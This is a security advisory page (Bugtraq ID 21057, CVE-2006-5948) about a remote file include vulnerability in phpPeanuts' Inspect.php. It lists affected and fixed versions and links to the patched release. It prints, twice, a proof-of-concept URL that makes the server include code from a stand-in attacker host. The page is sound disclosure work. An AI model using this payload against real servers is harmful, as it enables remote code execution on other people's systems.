PHPPeanuts Inspect.PHP Remote File Include Vulnerability
BID:21057
Info
PHPPeanuts Inspect.PHP Remote File Include Vulnerability
| Bugtraq ID: | 21057 |
| Class: | Input Validation Error |
| CVE: |
CVE-2006-5948 |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 14 2006 12:00AM |
| Updated: | Mar 06 2007 09:05PM |
| Credit: | Hidayat Sagita is credited with the discovery of this vulnerability. |
| Vulnerable: |
phpPeanuts phpPeanuts 1.2 phpPeanuts phpPeanuts 1.3 Beta 1 phpPeanuts phpPeanuts 1.2 beta 1 phpPeanuts phpPeanuts 1.2 alpha 2 phpPeanuts phpPeanuts 1.2 alpha 1 phpPeanuts phpPeanuts 1.1 phpPeanuts phpPeanuts 1.1 |
| Not Vulnerable: |
phpPeanuts phpPeanuts 1.3 Beta 1a phpPeanuts phpPeanuts 1.2.0a |
Discussion
Exploit / POC
PHPPeanuts Inspect.PHP Remote File Include Vulnerability
An attacker can exploit this issue via a web client.
The following proof of concept is available:
http://www.example.com/[phppeanuts_path]/pntUnit/Inspect.php?Include=http://example1.copm/evil_code.txt ?
An attacker can exploit this issue via a web client.
The following proof of concept is available:
http://www.example.com/[phppeanuts_path]/pntUnit/Inspect.php?Include=http://example1.copm/evil_code.txt ?
Solution / Fix
PHPPeanuts Inspect.PHP Remote File Include Vulnerability
Solution:
Please see the references for more information.
phpPeanuts phpPeanuts 1.1
phpPeanuts phpPeanuts 1.2 alpha 2
phpPeanuts phpPeanuts 1.2 beta 1
phpPeanuts phpPeanuts 1.2 alpha 1
phpPeanuts phpPeanuts 1.1
phpPeanuts phpPeanuts 1.2
Solution:
Please see the references for more information.
phpPeanuts phpPeanuts 1.1
-
Cuyahoga phpPeanuts_1_2_0a.zip
http://www.phppeanuts.org/site/index_php/Menu/23/download/phpPeanuts_1 _2_0a.zip/pntHandler/WebLicenseAgreementPage/pntRef/12/pntScd/d/Downlo ad.html
phpPeanuts phpPeanuts 1.2 alpha 2
-
Cuyahoga phpPeanuts_1_2_0a.zip
http://www.phppeanuts.org/site/index_php/Menu/23/download/phpPeanuts_1 _2_0a.zip/pntHandler/WebLicenseAgreementPage/pntRef/12/pntScd/d/Downlo ad.html
phpPeanuts phpPeanuts 1.2 beta 1
-
Cuyahoga phpPeanuts_1_2_0a.zip
http://www.phppeanuts.org/site/index_php/Menu/23/download/phpPeanuts_1 _2_0a.zip/pntHandler/WebLicenseAgreementPage/pntRef/12/pntScd/d/Downlo ad.html
phpPeanuts phpPeanuts 1.2 alpha 1
-
Cuyahoga phpPeanuts_1_2_0a.zip
http://www.phppeanuts.org/site/index_php/Menu/23/download/phpPeanuts_1 _2_0a.zip/pntHandler/WebLicenseAgreementPage/pntRef/12/pntScd/d/Downlo ad.html
phpPeanuts phpPeanuts 1.1
-
Cuyahoga phpPeanuts_1_2_0a.zip
http://www.phppeanuts.org/site/index_php/Menu/23/download/phpPeanuts_1 _2_0a.zip/pntHandler/WebLicenseAgreementPage/pntRef/12/pntScd/d/Downlo ad.html
phpPeanuts phpPeanuts 1.2
References
PHPPeanuts Inspect.PHP Remote File Include Vulnerability
References:
References:
- fixes in 1.2.0a (phpPeanuts)
- PHPPeanuts Homepage (Rings World)